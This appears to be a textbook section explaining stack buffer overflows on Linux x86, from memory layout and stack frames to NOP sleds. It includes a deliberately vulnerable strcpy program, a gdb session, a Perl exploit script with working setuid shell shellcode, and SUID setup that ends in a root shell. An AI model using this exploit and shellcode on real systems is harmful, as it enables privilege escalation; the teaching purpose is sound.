5.2. Overview of Stack Buffer Overflows

Security problems have always been an issue in software. From users abusing time-sharing operating systems in the '70s to the remote network compromises of the current day, software always has, and always will have, security bugs. Starting in the late 1980s a new type of software vulnerability known as overflows began to be exploited. Since then overflows have become the undisputed king of vulnerabilities, accounting for the majority of security advisories in the last 10 years.

What follows is a brief refresher on stack-based buffer overflows and how you can exploit them. This section is intended as an overview only, so feel free to skip ahead if you already have a firm grasp on the subject.

5.2.1. Memory Segments and Layout

In general, today's operating systems (OSes) support two levels of protected memory areas in which processes can run: user space and kernel space. The kernel space is where the core processes of the OS execute. The user space is where user-level processes, such as daemons, execute. Memory corruption attacks can therefore target two areas: kernel space and user-level processes. Kernel space attacks are beyond the scope of this chapter and really aren't what MSF was designed for, so we'll focus on user-space processes. Attacks against these processes can be divided into local and remote attacks. MSF in general is used to exploit programs that listen for remote network connections, and in the example module later in this chapter, we'll focus on this kind of attack.

Before discussing how to exploit process memory, it is necessary to understand how the virtual memory for user-level processes is organized. The following paragraphs discuss the Linux operating system on the x86 architecture. Many of the general concepts will apply to other operating systems and architectures.

When the OS initializes a process, it maps five main virtual memory segments. Each segment has a specific purpose and can either have a fixed size or grow as needed. Table 5-2 describes each standard memory segment in Linux. The code, data, and BSS segments are populated with information from the executable during process initialization. The heap and stack typically have fixed starting positions but then grow according to a program's instructions. It should be noted that wherever a fixed-size buffer exists in memory, it can overflow. However, our discussion will focus on stack segment buffer overflows, as they account for the majority of exploited overflows.

Table 5-2. Relevant user-space virtual memory segments

Segment name   Description
Code           This segment contains the actual instructions the program will execute.
Data           This segment contains global and static variables with initialized values.
BSS            This segment contains global and static variables that are uninitialized.
Heap           This segment is for dynamic memory allocations.
Stack          This segment is a memory range for allocation of variables local to a function and is thus dynamic, depending on the function call tree.

When the process has finished initialization, the segments will be ordered, as shown in Figure 5-1.

Figure 5-1. Virtual memory layout of a process

Now that we've looked at and described the memory segments, let's see in exactly which segments the variables in our code will be located. Here is a C code snippet that illustrates the memory regions where the variables will be allocated when the program is run:

#include <stdlib.h>                //for malloc( ) and free( )

int global_initialized = 311;      //located in the data segment
char global_uninitialized;         //located in the bss segment

int main( ){
    int local_int;                 //located on the stack
    static char local_char;        //located in the bss segment
    char *local_ptr;               //located on the stack
    local_ptr =(char *)malloc(12); //local_ptr points to 
                                   //a buffer located on the heap
    char buffer[12];               //entire buffer located on the stack
    free(local_ptr);               //release the heap buffer
    return 0;
}
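To see these placements on a live system, a small helper can print one sample address from each segment. The following is only a sketch: the names demo_initialized, demo_uninitialized, and print_segment_addresses( ) are made up for illustration, and the printed values depend on your compiler and OS. On current Linux systems, address randomization typically changes them from run to run.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

int demo_initialized = 311;    /* data segment */
char demo_uninitialized;       /* BSS segment */

/* Prints one sample address per segment to `out`.
   Returns the number of lines written, or -1 if malloc( ) fails. */
int print_segment_addresses(FILE *out)
{
    static char local_static;          /* BSS segment */
    int local_int = 0;                 /* stack */
    char *heap_buf = malloc(12);       /* pointer on the stack, target on the heap */

    assert(out != NULL);
    if (heap_buf == NULL)
        return -1;

    /* Addresses are converted to integers only so they can be displayed. */
    fprintf(out, "code   %#llx\n",
            (unsigned long long)(uintptr_t)&print_segment_addresses);
    fprintf(out, "data   %#llx\n",
            (unsigned long long)(uintptr_t)&demo_initialized);
    fprintf(out, "bss    %#llx\n",
            (unsigned long long)(uintptr_t)&local_static);
    fprintf(out, "heap   %#llx\n",
            (unsigned long long)(uintptr_t)heap_buf);
    fprintf(out, "stack  %#llx\n",
            (unsigned long long)(uintptr_t)&local_int);

    free(heap_buf);
    return 5;
}
```

Calling print_segment_addresses(stdout) from main( ) prints five lines, one per segment.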

5.2.2. How a Buffer Overflows and Why It Matters

A process can allocate memory using stack or heap segments. Heaps allow the allocation of memory dynamically using C functions such as malloc( ), but with this comes the overhead of the OS's internal dynamic memory allocation routines. Stacks are more convenient for developers because the declaration syntax is simpler, and there is no overhead from dynamic memory allocation routines of the OS.

A stack is a last-in-first-out (LIFO) data structure. The common stack operators are push (to add an item to the top of the stack) and pop (to remove the last item placed on the stack). These operators are implemented at the assembly level by instructions with the same names. On 32-bit x86 each stack slot is 32 bits wide, and the stack usually has a static starting position. Its current extent is tracked by the extended stack pointer (ESP) and extended base pointer (EBP) CPU registers, and it grows "down": as it grows, the top of the stack (ESP) gets closer to the lowest virtual memory address, as in Figure 5-2. The EBP register serves a special purpose, as it identifies the start of a stack frame by pointing to the bottom of the current stack frame. A stack frame is an area of memory that holds the local function variables as well as the arguments that were passed to the function that is executing. A new stack frame is allocated by saving the old EBP, moving EBP to the current top of the stack, and then subtracting from ESP to make room for local variables. The program performs these actions, and later undoes them, using two small series of assembly instructions known as the prolog and epilog.
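The push and pop behavior can be modeled in a few lines of C. This is a toy model rather than how the CPU is implemented: the sim_stack structure and the sim_ function names are hypothetical, and ESP is represented as an array index instead of a real address. The point it illustrates is that a push moves ESP toward lower addresses and a pop moves it back.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define SIM_STACK_WORDS 64

/* Hypothetical toy model: 32-bit slots, with ESP held as a slot index. */
struct sim_stack {
    uint32_t slot[SIM_STACK_WORDS];
    size_t esp;    /* index of the current top; starts one past the highest slot */
};

void sim_init(struct sim_stack *s)
{
    assert(s != NULL);
    s->esp = SIM_STACK_WORDS;        /* empty stack: ESP at the highest "address" */
}

void sim_push(struct sim_stack *s, uint32_t value)
{
    assert(s != NULL && s->esp > 0); /* refuse to run off the low end */
    s->esp -= 1;                     /* grow toward lower addresses */
    s->slot[s->esp] = value;
}

uint32_t sim_pop(struct sim_stack *s)
{
    uint32_t value;

    assert(s != NULL && s->esp < SIM_STACK_WORDS);  /* nothing to pop otherwise */
    value = s->slot[s->esp];
    s->esp += 1;                     /* shrink back toward higher addresses */
    return value;
}
```

Pushing 1 and then 2 leaves esp two slots lower than where it started, and the first sim_pop( ) returns 2, the last value pushed.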

Figure 5-2. Key elements of the stack segment

When a new function is called, the address of the caller's next instruction is pushed onto the stack. This address is where the extended instruction pointer (EIP) should point when the called function returns control to the caller. Then the prolog pushes the caller's EBP onto the stack and sets EBP equal to ESP. As seen in the code snippets in Table 5-3, this creates a new stack frame where space for new local variables can be allocated by simply subtracting from ESP to grow the stack.

Table 5-3. An example C program and its x86 disassembly

Example C program      x86 disassembly
1| void example( ){    1| example:
2| int i;              2| push %ebp
3| }                   3| mov %esp,%ebp
4| int main( ){        4| sub $0x4,%esp
5| example( );         5| leave
6| }                   6| ret
                       7| main:
                       8| push %ebp
                       9| mov %esp,%ebp
                       10| sub $0x8,%esp
                       11| call 0x8048310 <example>
                       12| leave
                       13| ret

In Table 5-3 a new stack frame is created when a new function gets called. Because there are two functions, we'll have two stack frames. In the disassembly, it's possible to identify where new stack frames are created by looking for three things: the prolog, the epilog, and use of the call instruction. Lines 8 and 9 of the disassembly show the prolog for the main function. Lines 2 and 3 show the prolog for the example function.

As the main function starts, the prolog sets up the new stack frame. Then a new frame for the example function begins on line 11. The call instruction pushes a pointer to the next instruction onto the top of the stack. Once in the example function, the function's prolog generates the next stack frame. On line 4, the stack size is adjusted by 4 bytes; this is the space needed to store the integer variable i. Finally, the example function's epilog executes on lines 5 and 6. It essentially reverses the actions of the prolog and erases the stack frame.

The epilog is important because the ret instruction returns control to the calling function. It sets the new instruction pointer based on the value stored on the stack during the call instruction. This is the key to what makes stack overflows so dangerous. Pointers that influence program flow are located on the stack. If these pointers can be overwritten, we can gain control of the program's execution.
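The call, prolog, and epilog sequence from Table 5-3 can be walked through with a toy machine written in C. Everything here is an illustrative assumption: the toy_cpu structure, the toy_ function names, and the instruction "addresses" 0x1000, 0x1010, and 0x2000 are made up, and the stack is indexed by word rather than by byte. The sketch shows that ret simply loads EIP with whatever value sits in the saved return slot.

```c
#include <assert.h>
#include <stdint.h>

#define TOY_WORDS 32

/* Hypothetical toy machine: a word-indexed stack plus ESP, EBP, and EIP. */
struct toy_cpu {
    uint32_t stack[TOY_WORDS];
    uint32_t esp;    /* index of the top-of-stack slot */
    uint32_t ebp;    /* index of the current frame base */
    uint32_t eip;    /* "address" of the next instruction */
};

static void toy_push(struct toy_cpu *c, uint32_t v)
{
    assert(c->esp > 0);
    c->stack[--c->esp] = v;
}

static uint32_t toy_pop(struct toy_cpu *c)
{
    assert(c->esp < TOY_WORDS);
    return c->stack[c->esp++];
}

/* call: save the address of the caller's next instruction, then jump. */
void toy_call(struct toy_cpu *c, uint32_t target, uint32_t return_addr)
{
    toy_push(c, return_addr);
    c->eip = target;
}

/* prolog: push %ebp; mov %esp,%ebp; sub $locals,%esp */
void toy_prolog(struct toy_cpu *c, uint32_t local_words)
{
    toy_push(c, c->ebp);
    c->ebp = c->esp;
    assert(c->esp >= local_words);
    c->esp -= local_words;
}

/* epilog: leave (mov %ebp,%esp; pop %ebp) followed by ret (pop into EIP). */
void toy_epilog(struct toy_cpu *c)
{
    c->esp = c->ebp;
    c->ebp = toy_pop(c);
    c->eip = toy_pop(c);
}

/* Runs main -> example -> return and reports the EIP that ret restored.
   A nonzero `clobber` overwrites the saved return slot before the epilog. */
uint32_t toy_run(uint32_t clobber)
{
    struct toy_cpu c = { {0}, TOY_WORDS, TOY_WORDS, 0x1000 };

    toy_prolog(&c, 2);                 /* main: sub $0x8,%esp is two words */
    toy_call(&c, 0x2000, 0x1010);      /* call example */
    toy_prolog(&c, 1);                 /* example: room for int i */
    if (clobber != 0)
        c.stack[c.ebp + 1] = clobber;  /* saved EIP sits one slot above saved EBP */
    toy_epilog(&c);
    return c.eip;
}
```

toy_run(0) returns 0x1010, the address saved by the call. toy_run(0x43434343) returns 0x43434343, because the epilog trusts whatever it finds in the saved slot.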

Here is a sample C code snippet that takes one user-controlled input and copies it to a fixed-size stack buffer:

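/* vuln.c */
#include <stdlib.h>   /* exit( ) */
#include <string.h>   /* strcpy( ) */

int main(int argc, char **argv){
    char fixed_buf[8];
    if(argc<2){exit(-1);}
    strcpy(fixed_buf,argv[1]);   /* no length check: this is the overflow */
    return 0;
}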

In the following section, the program will be compiled and traced with a debugger to show the overflow process in action. By using a program argument of AAAAAAAABBBBCCCC, we can see how saved EIP (sEIP) is overwritten. Figure 5-3 shows the stack frame before and after strcpy( ) to illustrate the stack's status after the overwrite. Note that the ASCII codes for the characters A, B, and C are 0x41, 0x42, and 0x43, respectively. Also notice that the sEIP is being overwritten with values we control!

Figure 5-3. The stack frame and setup before and after strcpy

Some compilers align stack buffers differently; depending on your compiler it might take more input to fully overwrite the sEIP with the example value 0x43434343.
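The overwrite can also be reproduced safely, without corrupting a real stack, by modeling the frame as a plain byte array. The layout below (an 8-byte buffer followed directly by a 4-byte saved EBP and a 4-byte sEIP) is an assumption matching the simplest case. As noted, real compilers may add padding. The function name simulate_overflow( ) and the original return value 0x0804841c are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Assumed frame layout, lowest address first (no compiler padding). */
enum { BUF_LEN = 8, SEBP_OFF = 8, SEIP_OFF = 12, FRAME_LEN = 16 };

#define ORIGINAL_RETURN 0x0804841cu   /* made-up legitimate return address */

/* Copies `input` to the start of the modeled frame the way strcpy( ) would:
   it ignores BUF_LEN and stops only at the terminator. The copy is clamped
   to FRAME_LEN so the simulation itself never writes out of bounds.
   Returns the saved EIP as a little-endian CPU would read it afterward. */
uint32_t simulate_overflow(const char *input)
{
    unsigned char frame[FRAME_LEN];
    size_t n;

    assert(input != NULL);
    memset(frame, 0, sizeof frame);

    /* Store the original return address in little-endian byte order. */
    frame[SEIP_OFF + 0] = (unsigned char)(ORIGINAL_RETURN & 0xff);
    frame[SEIP_OFF + 1] = (unsigned char)((ORIGINAL_RETURN >> 8) & 0xff);
    frame[SEIP_OFF + 2] = (unsigned char)((ORIGINAL_RETURN >> 16) & 0xff);
    frame[SEIP_OFF + 3] = (unsigned char)((ORIGINAL_RETURN >> 24) & 0xff);

    n = strlen(input) + 1;            /* strcpy( ) copies the terminator too */
    if (n > FRAME_LEN)
        n = FRAME_LEN;
    memcpy(frame, input, n);          /* the unchecked copy */

    return (uint32_t)frame[SEIP_OFF]
         | ((uint32_t)frame[SEIP_OFF + 1] << 8)
         | ((uint32_t)frame[SEIP_OFF + 2] << 16)
         | ((uint32_t)frame[SEIP_OFF + 3] << 24);
}
```

A short argument such as AAAA leaves the saved EIP at its original value, while AAAAAAAABBBBCCCC replaces it with 0x43434343.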

5.2.3. Shellcode

The good news is that now we have a way of controlling program flow. At this point we need what is commonly referred to as shellcode. Shellcode is a set of assembly instructions to which program flow can be redirected in order to perform some functionality. The term "shellcode" was coined to reflect the fact that it contains assembly instructions that execute a shell (command interpreter), often at higher privilege levels. But where should we place this shellcode? Because we already used our user input buffer to take control of EIP, there is no reason we can't use the same buffer to serve a dual purpose by also including the shellcode directly in the buffer. Because this overflow occurs in a C-style string, we should write the shellcode so that it contains no NULL (0x00) bytes, since strcpy( ) stops copying at the first one.

In an ideal world of exploitation, the top of the stack wouldn't move and we could jump to this known location every time. But in the real world of remote exploits many factors affect where the top of the stack will be on program return, so we need a solution for dealing with these variations in where our shellcode will lie.

One way of dealing with this problem is to use what is commonly known as a NOP sled. The NOP assembly instruction performs "no operation." It basically does nothing and has no effect on any CPU registers or flags. What is good about this is that we can prepend our shellcode with a buffer that consists solely of the bytes that represent the NOP instruction; on x86 architecture this is 0x90. This technique compensates for the stack's unpredictability by changing program flow to anywhere within the NOP sled, and the execution will continue up the buffer until it hits the shellcode.
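The effect of the sled can be illustrated with a short C function that mimics the CPU stepping over NOP bytes. It is a simplification that treats only the single-byte 0x90 as a NOP and does not execute anything. The function name slide_through_sled( ) is hypothetical.

```c
#include <assert.h>
#include <stddef.h>

#define X86_NOP 0x90

/* Starting at offset `entry`, steps over consecutive NOP bytes and returns
   the offset of the first byte that is not a NOP (or `len` if none is found).
   This models where execution "lands" after sliding down the sled. */
size_t slide_through_sled(const unsigned char *buf, size_t len, size_t entry)
{
    assert(buf != NULL && entry <= len);
    while (entry < len && buf[entry] == X86_NOP)
        entry++;
    return entry;
}
```

With a 16-byte sled followed by a payload, entering at offset 0, 9, or 15 yields the same result: offset 16, the first payload byte. That is why the return address needs to be only approximately right.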

Putting together the concepts we learned so far, we now can construct user input to take control of program execution and run arbitrary shellcode. Figure 5-4 shows what our final buffer for the first program argument will look like.

Figure 5-4. Final construction of the input buffer

The known values in this buffer are the shellcode and the NOP sled. For local exploits such as this one, you should use a shellcode that does setuid( ) and exec( ) to spawn the new root-level shell. The aforementioned \x90 character will be used to fill the NOP sled. In our example, the values to be used for the "filler space" buffer can be arbitrary printable ASCII, so we'll use the character A. The final unknown is the new EIP value, that is, the memory location we hope will be within our NOP sled. This new EIP value is commonly known as the return address. To find it, use a debugger to examine the process memory after using a trace buffer to trigger the vulnerability. We construct a trace buffer so that it is visually easier to find key areas of the buffer in memory.

First, compile the executable with debugging symbols:

$ gcc vuln.c -o vuln -g

Next, run the gdb debugger. Once in the gdb shell, run the program with a simple trace buffer generated from the command line using Perl:

$ gdb -q vuln
(gdb) run `perl -e 'print "A"x28 . "1234" . "C"x1024'`
Starting program: /home/cabetas/research/book/vuln `perl -e 
'print "A"x28 . "1234" . "C"x1024'`

Program received signal SIGSEGV, Segmentation fault.
0x34333231 in ?? ( )
(gdb) x/x $esp
0xbfff8d60:     0x43434343
(gdb) x/x $esp+1020
0xbfff915c:     0x43434343
(gdb) print ($esp+512)
$1 = (void *) 0xbfff8f60

Note that the buffer's structure is modeled after what our eventual exploit buffer will look like, with the bytes 1234 directly overwriting the sEIP and the Cs representing where our NOP sled will be. Also note that in this example the compiler aligned the buffer in such a way that it took 28 bytes of filler before the sEIP was overwritten.

The program generates a segmentation fault, which signifies that it attempted to access an unmapped area of memory. This memory location is 0x34333231, the ASCII code equivalent of 4321.

Little-Endian Memory Values

Why did our sEIP overwrite come out backward from our input? The answer has to do with how memory values are stored on x86 architectures. The little-endian format stores the least significant byte of a multibyte value at the lowest memory address. For our example, the input bytes 1234 (0x31 0x32 0x33 0x34 in memory order) are read back as the 32-bit value 0x34333231 on a little-endian machine, whereas a big-endian machine would read them as 0x31323334. The byte values remain the same; only the order in which they are assembled into a word differs.
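The two interpretations can be checked with a few lines of portable C. The helper names read_le32( ), read_be32( ), and write_le32( ) are made up for this sketch. They assemble the value with shifts, so the result does not depend on the machine the code runs on.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Reads four bytes as a little-endian 32-bit value (lowest address = low byte). */
uint32_t read_le32(const unsigned char *p)
{
    assert(p != NULL);
    return (uint32_t)p[0]
         | ((uint32_t)p[1] << 8)
         | ((uint32_t)p[2] << 16)
         | ((uint32_t)p[3] << 24);
}

/* Reads the same four bytes as a big-endian value (lowest address = high byte). */
uint32_t read_be32(const unsigned char *p)
{
    assert(p != NULL);
    return ((uint32_t)p[0] << 24)
         | ((uint32_t)p[1] << 16)
         | ((uint32_t)p[2] << 8)
         | (uint32_t)p[3];
}

/* Writes a 32-bit value in little-endian byte order. */
void write_le32(unsigned char *p, uint32_t v)
{
    assert(p != NULL);
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}
```

Given the bytes '1', '2', '3', '4', read_le32( ) returns 0x34333231 and read_be32( ) returns 0x31323334. Going the other way, write_le32( ) stores a value such as 0xbfff8f60 as the byte sequence 0x60 0x8f 0xff 0xbf.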

After the program crashes, examine the memory located at the stack pointer (ESP). You'll notice it points to byte values that represent the letter C. If you examine the memory before and after ESP you'll see that the run of Cs actually starts here and that its last four-byte block is located at $esp+1020. Because this is where we will eventually place our NOP sled, we want to find a value within this range. We will use the $esp+512 value because it's the midpoint of the buffer, which leaves the most room for the stack to shift in either direction. Now we have the new EIP value that the exploited program will return to: 0xbfff8f60.
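The arithmetic behind this choice is simple enough to verify in code. The sketch below uses the ESP value from the gdb session above. The function names sled_midpoint( ) and lands_in_sled( ) are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Returns the address halfway into a sled of `sled_len` bytes. */
uint32_t sled_midpoint(uint32_t sled_start, uint32_t sled_len)
{
    assert(sled_len > 0);
    return sled_start + sled_len / 2;
}

/* Returns nonzero if `addr` falls inside [sled_start, sled_start + sled_len). */
int lands_in_sled(uint32_t addr, uint32_t sled_start, uint32_t sled_len)
{
    return addr >= sled_start && addr - sled_start < sled_len;
}
```

For a 1,024-byte sled starting at 0xbfff8d60, sled_midpoint( ) gives 0xbfff8f60, which matches the gdb output of print ($esp+512). With that choice, the sled's position can move by up to about 512 bytes in either direction before the return address misses it.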

5.2.4. Putting It All Together: Exploiting a Program

All the elements of our exploit buffer are in place: the filler, the new EIP the program will return to, the NOP sled, and our shellcode. It's time to try it out from the command line outside the debugger. Here is a Perl script that generates an exploit buffer using the previously discussed values. Note that the pack( ) function handles the little-endian conversion:

#!/usr/bin/perl
# File: exploit_buffer.pl
my $shellcode = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".
                "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b".
                "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd".
                "\x80\xe8\xdc\xff\xff\xff/bin/sh";
my $return = 0xbfff8f60;
print "A"x28 . pack('V',$return) . "\x90"x1024 . $shellcode;
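For readers who think more easily in C than in Perl, the layout the script emits (filler, return address, NOP sled, payload) can be sketched as a buffer-building function. This is an illustration of the byte layout only: build_layout( ) is a made-up name, and the payload is whatever bytes the caller passes in.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Fills `out` with: filler 'A's | return address (little-endian) | NOP sled | payload.
   Returns the number of bytes written, or 0 if `out_cap` is too small. */
size_t build_layout(unsigned char *out, size_t out_cap,
                    size_t filler_len, uint32_t ret, size_t sled_len,
                    const unsigned char *payload, size_t payload_len)
{
    size_t total = filler_len + 4 + sled_len + payload_len;
    size_t off = 0;

    assert(out != NULL && (payload != NULL || payload_len == 0));
    if (total > out_cap)
        return 0;

    memset(out + off, 'A', filler_len);          /* filler up to the sEIP */
    off += filler_len;

    /* Same byte order that pack('V', ...) produces in the Perl script. */
    out[off++] = (unsigned char)(ret & 0xff);
    out[off++] = (unsigned char)((ret >> 8) & 0xff);
    out[off++] = (unsigned char)((ret >> 16) & 0xff);
    out[off++] = (unsigned char)((ret >> 24) & 0xff);

    memset(out + off, 0x90, sled_len);           /* NOP sled */
    off += sled_len;

    if (payload_len > 0)
        memcpy(out + off, payload, payload_len); /* caller-supplied bytes */
    off += payload_len;

    return off;
}
```

With a 28-byte filler, the return value 0xbfff8f60, an 8-byte sled, and a 3-byte placeholder payload, the function writes 43 bytes: the return address occupies offsets 28 through 31, the sled offsets 32 through 39, and the payload starts at offset 40.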

The chown and chmod commands are used to set up our example program as a set user ID (SUID) application. These commands cause the program to be executed at the root user's privilege level. This is done to demonstrate the effect of an exploited SUID root program in the wild.

$ su
Password:
# chown root:root ./vuln
# chmod +s ./vuln
# exit
$ ls -la vuln
-rwsrwsr-x    1 root     root         5817 Jan 24 05:50 vuln

Now for the actual exploitation of the program. Use the ` (backtick) character to execute the Perl script that generates our exploit buffer. This buffer becomes the first argument to our vulnerable program. As previously mentioned, the overflow overwrites the sEIP with our new return value, which should point into our NOP sled. Execution continues up the NOP sled until our shellcode executes, giving us root access.

$ ./vuln `perl exploit_buffer.pl`
# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

If you are using Perl version 5.8.0 or newer with Unicode support, you should unset the LANG environment variable to ensure that functions such as pack( ) work as expected. Various parts of MSF will fail otherwise. As a test, the following shell command should print the number 4 when your locale settings are correct:

perl -e 'print pack("V",0xffffffff);' |wc -c